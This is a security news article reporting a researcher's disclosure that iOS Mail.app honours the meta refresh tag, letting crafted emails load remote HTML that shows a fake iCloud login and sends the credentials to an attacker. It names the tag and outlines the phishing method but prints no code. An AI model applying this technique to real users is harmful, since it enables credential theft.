The email client shipped with Apple’s iOS mobile operating system is plagued by a vulnerability that can be exploited to load remote arbitrary HTML content in the application, a researcher has warned.
Czech researcher Jan Souček published proof-of-concept (PoC) code and a video earlier this week to demonstrate his findings.
The expert discovered in January that the iOS email client (Mail.app) doesn’t ignore the <meta http-equiv=refresh> HTML tag in email messages. This allows an attacker to create emails that load remote HTML content when opened.
“JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS,” Soucek said.
The researcher has published a video in which he shows how an attacker can send out a specially crafted email that prompts recipients to enter their iCloud credentials. The username and password collected from the victim are then sent back to the attacker.
Users noted on Hacker News that such an attack is likely to work against many internauts because it’s not uncommon for them to be asked to enter their iCloud credentials and the genuine dialog box designed by Apple is easy to replicate.
Souček has published the source code for an iOS 8.3 “inject kit” on GitHub. The expert has pointed out that this is just an example to demonstrate the existence of the vulnerability, which can be leveraged for other attacks as well, not just credentials harvesting.
“The vulnerability can be used for anything that requires HTML tags not supported by Mail.app,” Souček explained.
The researcher said he reported the flaw to Apple back in January via the company’s Radar bug tracking system. He has now decided to publicly disclose the vulnerability because Apple has failed to take any action.
It’s worth noting that Apple released the first iOS 9 Beta and iOS 8.4 Beta 4 this week, but it’s unclear if these versions address the vulnerability. Even if they do fix the flaw, these variants are currently only available to developers.
Independent security analyst Graham Cluley has pointed out that the code published by the researcher might be put to good use by malicious hackers and identity thieves.
“Although I can understand his frustration with Apple’s lack of response for fixing the issue, Soucek could have applied pressure to the company by demonstrating the flaw to the tech media, rather than releasing exploit code for potential misuse,” Cluley wrote in a blog post for Tripwire. “Meanwhile, as we wait for Cupertino to roll out a patch, it would be wisest to either exercise extreme caution whenever an unexpected pop-up appears while perusing our Mail inbox, or use a third-party email app instead.”
